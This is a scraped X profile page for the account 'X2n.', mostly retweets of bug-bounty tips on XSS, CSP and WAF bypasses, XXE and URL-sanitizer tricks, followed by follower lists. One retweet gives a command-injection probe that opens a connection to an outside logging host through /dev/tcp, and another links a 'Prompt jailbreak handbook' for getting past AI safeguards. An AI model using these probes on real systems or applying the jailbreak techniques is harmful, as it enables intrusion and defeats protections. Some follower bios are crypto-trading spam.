-
Tweets47
-
Followers49
-
Following335
-
Likes590
X2n. retweeted
Jokes aside about Microsoft using AI slop here last night msrc.microsoft.com/blog/2025/08/p… what's impressing is how they popped a 0-click XSS. This is the main reason why postMessage are novel bugs. The most mind blowing part is, they got XSS in the end without any user interaction.
0
7
88
4K
44
Download Image
X2n. retweeted
New Android host validation bypass technique! [1/4] All parsed URIs in Android are android.net.Uri.StringUri objects. However, the scheme parser only looks for the ":" delimiter
X2n. retweeted
java的 xxe jdk版本稍微高一点的读不出换行和特殊字符 可以用我这个搭建ftp服务 在路径那里当参数去读 blog.chain0x0.com/blog/java%20xx…
X2n. retweeted
I just found the coolest csp bypass ever! did you know that a valid pdf can ALSO be valid javascript? (details below)
X2n. retweeted
Just found an interesting behavior in Firefox that can be used for XSS: If a response lacks the Content-Type header, Firefox renders it as text/plain. But if the URL ends with an extension like .html, Firefox treats it as that. #bugbounty #bugbountytips
X2n. retweeted
Today I used a technique that’s probably not widely known in the community. In what cases could code like this lead to a vulnerability? ->
X2n. retweeted
Breaking URL sanitizers with different encoding types. A useful cheatsheet by @hackerscrolls Code: gist.github.com/hackerscrolls/…
X2n. retweeted
Somehow, Chrome 130+ started parsing the hostname from javascript URLs again and this can be used for a constrained XSS 🤯 challenges.ethiack.ninja/leak-the-secre… This was the second solution for the recent CTF challenge.
X2n. retweeted
Did not know you could specify Unicode codepoints this way in JS. Pretty sick. Shoutout to the @yeswehack team for a great article over at: yeswehack.com/learn-bug-boun…
X2n. retweeted
read this kpwn.de/2023/05/javasc…
X2n. retweeted
你若放弃了成长,五年、十年之后你肯定还是老样子,但只要去改变,就有可能收获至新的自己。人生没有什么定数,不折腾,时间同样会过去,所以,去做总比不做好,开始总比放弃强。只要你心中还有希望,什么时候都是开始的最好时机。
X2n. retweeted
既然有朋友问如何入门 Web3 安全(尤其是智能合约安全),我简单列点当下觉得还不错的资源吧。牢记下:这玩意,最重要的是实战,是需要你一天到晚长期在这个领域积累,才可能有些成就。另外,兴趣一定是最大的驱动力,三天打鱼两天撒网,那不叫兴趣,那叫自欺欺人...
X2n. retweeted
字符编码绕waf 不需要javascript字符串 应该能绕很多
字符编码绕waf 不需要javascript字符串 应该能绕很多 https://t.co/R0qqj1ipgH
X2n. retweeted
在没有curl的情况下可以使用cat来探测命令注入 cat < /dev/tcp/dnslog.com/
X2n. retweeted
X2n. retweeted
Prompt越狱手册第一版现在已经发布了,有点仓促。后续会不断进行优化。作者是洺熙,我个人仅作为代发。github.com/Acmesec/Prompt… github.com/Acmesec/Prompt…
X2n. retweeted
XSS based on DNS CNAME Type Record
X2n. retweeted
Just published a new blog post, have a look: 0x999.net/blog/exploring… Solution to the XSS challenge in the comments👇
X2n. retweeted
Is the following code snippet vulnerable? 🤔
ssss @ssss78762873824
0 Followers 44 Following
Vwesaw @Vwesaw069886
29 Followers 1K Following
Mr Owl @ziko29504803
559 Followers 1K Following Bug Bounty Hunter - BBH Top 10 OWASP vulnerabilities Cyber Security It's better to lose yourself when you hacking
rkrksha @rkrksha
5 Followers 58 Following
Luis_0xyi @0xyilu
2K Followers 1K Following WhiteHat| cofounder@BitsLab @movebit_ @tonbit_ @scalebit_| A fan of #Move #ZKP #BTC #TON
Monica Kupchin @kupchin41515
71 Followers 957 Following
比特幣策略聚合... @DeborahKin77581
0 Followers 10 Following 📈大神交易员策略实时转发:秒级延迟|ai智能翻译 🌎70余位国内外优质KOL:优胜劣汰|不断更换新血液 🔥 优质的社区氛围 :群友在线喂饭|共同学习进步 📚 丰富的交易课程:培训交易体系|提高交易胜率 📲微信:YJGGGI |电报:https://t.co/wWH6HLJZmM
低价搬运币圈付... @BarbaraBro80724
1 Followers 18 Following 📈大神交易员策略实时转发:秒级延迟|ai智能翻译 🌎70余位国内外优质KOL:优胜劣汰|不断更换新血液 🔥 优质的社区氛围 :群友在线喂饭|共同学习进步 📚 丰富的交易课程:培训交易体系|提高交易胜率 📲微信:YJGGGI |电报:https://t.co/p0eFQzDxnr
Overlap @Overlap267767
0 Followers 31 Following
lunax @naxlu5
3 Followers 229 Following
kidll @_kidll_
47 Followers 723 Following
soda @0ca9dh
6 Followers 92 Following
Fred Howard @Shine_FLAGiveUP
1 Followers 226 Following
zhihui li @huihuichaser
0 Followers 1 Following
xiluxixi @xiluxixi12138
0 Followers 8 Following
renren @renren256693
4 Followers 314 Following
DedSec @dedsec_whoami
1 Followers 149 Following
Luke Jahnke @lukejahnke
3K Followers 6K Following
ww w @www1138448
0 Followers 41 Following
Test22 Test @Test22Test28528
0 Followers 13 Following
平常心 @xngzh123
4 Followers 146 Following
biubiubiu @biubiub47660829
1 Followers 119 Following
Pearce @PearceChen42
208 Followers 3K Following I'm one bug🐞in cybersecurity. Hackers are philosophers of the information age, who reveal the truth of the world through in-depth research and subversion.
A Xu @AXu079166644293
1 Followers 21 Following
fuzz0exp @fuzz0exp
10 Followers 699 Following
不抽香烟 @ganfanmeiguolao
3 Followers 103 Following
hupeng @corr_ff
8 Followers 198 Following
0-0 @a1m0ml
1 Followers 71 Following
Kendlyz @Break47961154
192 Followers 3K Following CTFer| 区块链安全 | web🐶|链上追踪|hunter| Mixer Analysis 烦恼终究是一种暮气,是一种病态
lol @loOOo00oO0ol
0 Followers 1K Following
kolten @Merl1ng
126 Followers 4K Following
Tiffany @tiffany_jeffrie
236 Followers 3K Following
Boris Larin @oct0xor
18K Followers 655 Following Former console hacker (PS3/PS4). Hunting in the wild 0-days at Kaspersky GReAT. All tweets are my own.
chux @chux13786509
8K Followers 324 Following Web Warrior 👻 | Bug Hunter | CVE-2024-46990 | CVE-2024-54128 | CVE-2025-29930 | https://t.co/LbpguTTSEk | https://t.co/e9bO0RZKlB
OpenAI @OpenAI
4.3M Followers 3 Following OpenAI’s mission is to ensure that artificial general intelligence benefits all of humanity. We’re hiring: https://t.co/dJGr6Lg202
ele7enxxh @ele7enxxh
887 Followers 49 Following Google Bughunter 2022 #1, Qualcomm Hackerone 2022 #1, Android Chip Security Reward Hackerone 2022 #1, Android/IoT/Vehicles security researcher
ESET Research @ESETresearch
35K Followers 30 Following Security research and breaking news straight from ESET Research Labs.
sahuang @sahuang97
3K Followers 730 Following Founder @ProjectSekaiCTF | Ex Software Engineer @Microsoft | Chunithm 虹レ | Web3 Learner @taichiaudit (Move/Solana)
xia0o0o0o @Nyaaaaa_ovo
3K Followers 1K Following Write some shit code. CTF with @r3kapig. Do shit security research. Currently at University of California, San Diego. DEFCON 31/32/33 finalist | LOOKING FOR JOB
stephen @_tsuro
10K Followers 527 Following @v8js security, CTFs and CPU vulnz. LCHL. @[email protected]
solst/ICE @IceSolst
21K Followers 2K Following Pentester turned seceng turned meeting canceller - https://t.co/5hHG2R5lRS (-13$ ARR)
xss0r @xss0r
6K Followers 3K Following xss0r Deploying an alert box in a web app is like having a tiny pop-up comedian shout 'Surprise!' whenever you least expect it! #xss0r #ibrahimXSS #Blindxss0r
Matthias Kaiser @matthias_kaiser
6K Followers 1K Following Java/Android Vulnerability Researcher. 0xACED. Ex-Apple. Now @matthiaskaiser.bsky.social
Remedy @xyz_remedy
5K Followers 245 Following Join https://t.co/YR6oIDfjA9, the Leading Web3 Cybersecurity Community with exclusive bug bounties, innovative open-source tools, and endless opportunities to level up.
Valentino Massaro @valent1nee
325 Followers 125 Following
Gynvael Coldwind @gynvael
38K Followers 1K Following security researcher/programmer/director @ HexArcana Cybersecurity GmbH ⁂ @pagedout_zine ⁂ @DragonSectorCTF ⁂ https://t.co/ShG2c5As1K ⁂ ex-Google ⁂ he/him
Louis Nyffenegger @snyff
20K Followers 590 Following Founder/CEO/Trainer/Researcher/CVE archeologist @PentesterLab. Security engineer. Bugs are my own, not of my employer...
XBOW @Xbow
10K Followers 6 Following Bringing AI to offensive security by autonomously finding and exploiting web vulnerabilities. Watch XBOW hack things: https://t.co/D5Mco1u8zM
mhmd berro (badcracke... @badcrack3r
7K Followers 373 Following 22 Years old. Researcher at hackerone. Known as badcracker. Listed at more than 100 companies hacker's hall of fame.
露西的百宝箱 @Lucy_love_AI
44K Followers 27 Following 🌊 自由职业者 👉🏻 AI工具/实用软件/搞钱干货/职场提升 💓 我要分享 1000 篇实用干货! 你想要的这里全都有⬇️
Csaba Fitzl @theevilbit
8K Followers 1K Following macOS Security -- Trail running 🏃 -- Mountains ⛰ -- Tolkien fan For mountain pictures, go to: https://t.co/Xf7KDW5fKu
Samuel Groß @5aelo
24K Followers 501 Following Working on Project Zero, Big Sleep, and V8 Security. Personal account. Also @[email protected] and https://t.co/aVitnPjBie
maxpl0it @maxpl0it
9K Followers 869 Following Principal Vulnerability Researcher at @InterruptLabs. Occasional Pwn2Owner
𝕏 Bug Bounty Write... @bountywriteups
35K Followers 4K Following 🔍 Bug Bounty Hunter | Content Creator | Sharing cybersecurity write-ups & resources | AI | | by @piyush_supiy #bugbounty #bugbountytips
xssdoctor @xssdoctor
4K Followers 372 Following hacker and cardiologist… not necessarily in that order
Winslow @senzee1984
2K Followers 482 Following 中文/English/日本語 Security Research | Red Team | Game Hacking | Exploit Development | Malware | Evasion Opinions are my own
𝗛𝗮𝗽𝗽𝘆�... @HappyQQ_CN
358 Followers 2 Following 𝔸𝕀 𝕀𝕟𝕕𝕚𝕖 ℍ𝕒𝕔𝕜𝕖𝕣 | 𝕀𝕟𝕕𝕚𝕖 ℍ𝕒𝕔𝕜𝕖𝕣 | 𝔽𝕦𝕝𝕝-𝕤𝕥𝕒𝕔𝕜 𝕕𝕖𝕧𝕖𝕝𝕠𝕡𝕖𝕣,
ZoomEye @zoomeye_team
9K Followers 508 Following A cyberspace search engine built for security researcher Daily Tricks || Latest Vulnerability Updates Email: [email protected] https://t.co/AUq5jNpKkl
HAPPY @ret2happy
536 Followers 941 Following Blockchain Security Researcher | 2022/2024 Top 20 Chrome VRP Researcher
zh1x1an1221 @zh1x1an1221
923 Followers 298 Following Bug bounty hunter | 2024 Top 20 Chrome VRP Researcher|Web3 smart contract auditor | prev Ant Security Tianqiong Light-Year Lab
SinSinology @SinSinology
13K Followers 674 Following Pwn2Own 20{22,23,24,24.5,25,25.5}, i look for 0-Days but i find N-Days & i chase oranges 🍊
Jun Kokatsu @shhnjk
6K Followers 117 Following Hacking the Web, Browsers, and Agents. Opinions are my own.
slonser @slonser_
4K Followers 163 Following Co-Founder @neploxaudit. CTF team @C4TBuTS4D Security Researcher at Solidlab.
Ryan Barnett (B0N3) @ryancbarnett
5K Followers 401 Following Web App Defender | Bug Hunter/Triager | Purple Team | Detection Engineering | Author | Senior Threat Research Manager @Akamai_research | OWASP Project Leader ✝️
Dark Web Informer @DarkWebInformer
129K Followers 60 Following Providing Cyber Threat Intelligence from the Dark Web & Clearnet: Breaches, Ransomware, Darknet Markets, Threat Alerts & more. https://t.co/Fi7VW9lg94
spaceraccoon | Eugene... @spaceraccoonsec
25K Followers 302 Following Here to learn! Infosec@Open Government Products | White Hat && SecOps
Andrej Karpathy @karpathy
1.4M Followers 1K Following Building @EurekaLabsAI. Previously Director of AI @ Tesla, founding team @ OpenAI, CS231n/PhD @ Stanford. I like to train large deep neural nets.
MalDev Academy @MalDevAcademy
17K Followers 5 Following Providing specialized, module-based security training and resources designed for cyber security professionals
Trust @trust__90
23K Followers 477 Following Head of Trust Security, DM for booking | Master of hand-to-hand audit combat | C4/Immunefi/Sherlock VIP | Hacked Embedded, IoT, iOS in past lifeTrends for United States
119 B posts
25,8 B posts
1.148 posts
2.691 posts
34,9 B posts
3.800 posts
8.053 posts
32,8 B posts
1.313 posts
1.258 posts
73,7 B posts
45,5 B posts
277 B posts
22,2 B posts
81,5 B posts
82,3 B posts
48,9 B posts
155 B posts
34 B posts
You might like
Elon Musk
@elonmusk
225.3M Followers
Barack Obama
@BarackObama
130.6M Followers
Cristiano Ronaldo
@Cristiano
115.7M Followers
Justin Bieber
@justinbieber
108.9M Followers
Donald J. Trump
@realDonaldTrump
108.8M Followers
Rihanna
@rihanna
107.6M Followers
Taylor Swift
@taylorswift13
93.7M Followers
NASA
@NASA
87.8M Followers
Lady Gaga
@ladygaga
81.7M Followers
YouTube
@YouTube
79.0M Followers
Kim Kardashian
@KimKardashian
74.4M Followers
The Ellen Show
@EllenDeGeneres
73.2M Followers
X
@X
68.9M Followers
Virat Kohli
@imVkohli
67.9M Followers
Bill Gates
@BillGates
66.4M Followers
Selena Gomez
@selenagomez
64.9M Followers
Neymar Jr
@neymarjr
63.9M Followers
CNN Breaking News
@cnnbrk
63.9M Followers
CNN
@CNN
63.7M Followers
Justin Timberlake
@jtimberlake
59.2M Followers